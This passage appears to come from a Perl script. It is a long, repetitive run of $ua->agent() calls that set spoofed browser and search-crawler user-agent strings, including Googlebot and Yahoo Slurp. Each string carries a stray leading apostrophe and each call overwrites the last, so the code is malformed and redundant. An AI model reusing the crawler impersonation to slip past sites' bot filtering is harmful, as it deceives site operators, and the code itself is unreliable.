  4679. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)");
  4680. $ua->agent("'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0");
  4681. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16");
  4682. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)");
  4683. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13");
  4684. $ua->agent("'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)");
  4685. $ua->agent("'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)");
  4686. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)");
  4687. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)");
  4688. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)");
  4689. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8");
  4690. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7");
  4691. $ua->agent("'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");
  4692. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)");
  4693. $ua->agent("'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)");
  4694. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  4695. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4696. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4697. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  4698. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  4699. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  4700. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  4701. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  4702. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)");
  4703. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  4704. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)");
  4705. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  4706. $ua->agent("'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)");
  4707. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)");
  4708. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)");
  4709. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  4710. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)");
  4711. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  4712. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  4713. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  4714. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4715. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4716. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  4717. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  4718. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  4719. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  4720. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  4721. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)");
  4722. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  4723. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)");
  4724. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  4725. $ua->agent("'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36");
  4726. $ua->agent("'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36");
  4727. $ua->agent("'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5");
  4728. $ua->agent("'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5");
  4729. $ua->agent("'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3");
  4730. $ua->agent("'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0");
  4731. $ua->agent("'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0");
  4732. $ua->agent("'Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0");
  4733. $ua->agent("'Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0");
  4734. $ua->agent("'Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3");
  4735. $ua->agent("'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0");
  4736. $ua->agent("'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0");
  4737. $ua->agent("'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)");
  4738. $ua->agent("'Mozilla/5.0(compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)");
  4739. $ua->agent("'Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)");
  4740. $ua->agent("'Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+");
  4741. $ua->agent("'Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+");
  4742. $ua->agent("'Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+");
  4743. $ua->agent("'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7");
  4744. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5");
  4745. $ua->agent("'Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25");
  4746. $ua->agent("'Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2");
  4747. $ua->agent("'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10");
  4748. $ua->agent("'Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3");
  4749. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27");
  4750. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  4751. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4752. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4753. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  4754. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  4755. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  4756. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  4757. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  4758. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)");
  4759. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  4760. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)");
  4761. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  4762. $ua->agent("'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36");
  4763. $ua->agent("'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36");
  4764. $ua->agent("'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5");
  4765. $ua->agent("'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5");
  4766. $ua->agent("'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3");
  4767. $ua->agent("'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0");
  4768. $ua->agent("'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0");
  4769. $ua->agent("'Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0");
  4770. $ua->agent("'Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0");
  4771. $ua->agent("'Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3");
  4772. $ua->agent("'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0");
  4773. $ua->agent("'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0");
  4774. $ua->agent("'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)");
  4775. $ua->agent("'Mozilla/5.0(compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)");
  4776. $ua->agent("'Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)");
  4777. $ua->agent("'Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+");
  4778. $ua->agent("'Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+");
  4779. $ua->agent("'Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+");
  4780. $ua->agent("'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7");
  4781. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5");
  4782. $ua->agent("'Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25");
  4783. $ua->agent("'Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2");
  4784. $ua->agent("'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10");
  4785. $ua->agent("'Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3");
  4786. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27");
  4787. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  4788. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4789. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4790. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  4791. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  4792. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  4793. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  4794. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  4795. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)");
  4796. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  4797. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)");
  4798. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  4799. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  4800. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  4801. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4802. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  4803. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  4804. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  4805. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  4806. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  4807. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  4808. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  4809. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  4810. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  4811. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  4812. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  4813. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  4814. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  4815. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  4816. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  4817. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  4818. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  4819. $ua->agent("'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)");
  4820. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)");
  4821. $ua->agent("'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)");
  4822. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)");
  4823. $ua->agent("'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10");
  4824. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4");
  4825. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0");
  4826. $ua->agent("'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10");
  4827. $ua->agent("'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)");
  4828. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
  4829. $ua->agent("'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)");
  4830. $ua->agent("'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)");
  4831. $ua->agent("'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16");
  4832. $ua->agent("'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  4833. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)");
  4834. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  4835. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)");
  4836. $ua->agent("'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)");
  4837. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
  4838. $ua->agent("'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0");
  4839. $ua->agent("'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)");
  4840. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)");
  4841. $ua->agent("'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  4842. $ua->agent("'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)");
  4843. $ua->agent("'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10");
  4844. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)");
  4845. $ua->agent("'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007");
  4846. $ua->agent("'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179");
  4847. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)");
  4848. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)");
  4849. $ua->agent("'Googlebot/2.1 (http://www.googlebot.com/bot.html)");
  4850. $ua->agent("'Opera/9.20 (Windows NT 6.0; U; en)");
  4851. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)");
  4852. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)");
  4853. $ua->agent("'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0");
  4854. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16");
  4855. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)");
  4856. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13");
  4857. $ua->agent("'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)");
  4858. $ua->agent("'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)");
  4859. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)");
  4860. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)");
  4861. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)");
  4862. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8");
  4863. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7");
  4864. $ua->agent("'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");
  4865. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)");
  4866. $ua->agent("'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)");
  4867. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  4868. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4869. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
